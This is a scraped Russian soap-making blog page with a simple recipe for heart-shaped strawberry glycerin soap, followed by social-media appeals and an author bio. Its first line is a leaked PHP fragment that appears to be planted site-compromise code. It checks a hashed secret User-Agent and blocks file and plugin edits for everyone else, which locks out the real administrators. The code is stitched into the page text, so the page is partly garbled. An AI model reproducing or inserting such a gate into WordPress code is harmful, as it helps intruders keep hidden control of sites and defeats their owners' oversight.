if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Делаем своими руками мыло “Сердце из роз” | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Делаем своими руками мыло “Сердце из роз”

На этот раз мы сделаем ароматное земляничное мыльце в форме сердечка

Пона­до­бят­ся:

  • Про­зрач­ная основа;
  • Базо­вые мас­ла (мас­ло ромаш­ки, чере­ды, пер­си­ка, грец­ко­го оре­ха, из вино­град­ных косто­чек и мас­ло заро­ды­шей пшеницы);
  • Аро­ма­ти­за­тор «Зем­ля­ни­ка»;
  • Крас­ный пиг­мент на мас­ля­ной основе;
  • Ста­кан­чик, шпаж­ка, фор­моч­ка из сили­ко­на в виде сердца.
  1. Мыль­ную осно­ву рас­то­пить на водя­ной бане.
  2. В пла­сти­ко­вом ста­кан­чи­ке сме­шать пару капель кра­си­те­ля, пять капель сме­си базо­вых масел и аро­ма­ти­за­тор. В полу­чен­ную смесь вылить рас­топ­лен­ную осно­ву, сбрыз­нуть спир­том, что­бы про­па­ли обра­зо­вав­ши­е­ся на поверх­но­сти пузырьки.
    сердце1
  3. Смесь вылить в фор­му. Дождать­ся высыхания.

И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Юлия

Обожаю в свободное время заниматься мыловарением. Уже съела на этом целую собаку! Вот теперь спешу поделиться с вами своими работами ;) Читайте все мои записи!